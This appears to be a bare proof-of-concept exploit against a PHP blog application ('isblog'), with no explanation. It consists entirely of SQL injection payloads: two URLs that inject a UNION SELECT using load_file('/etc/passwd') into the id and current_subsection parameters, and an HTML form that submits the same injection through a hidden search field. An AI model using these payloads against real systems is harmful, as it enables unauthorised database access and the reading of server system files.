http://www.example.com/isblog/index.php?id=-99+union+select+0,1,2,3,4,5,6,load_file('/etc/passwd'),8/* http://www.example.com/isblog/index.php?current_subsection=-99+union+select+0,1,2,3,4,5,6,load_file('/etc/passwd'),8/* <form action="http://www.example.com/isblog/index.php?action=search" method="post"> <input type="hidden" name="term" value="-99' union select 0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*"> <input type="submit" value="send"> </form>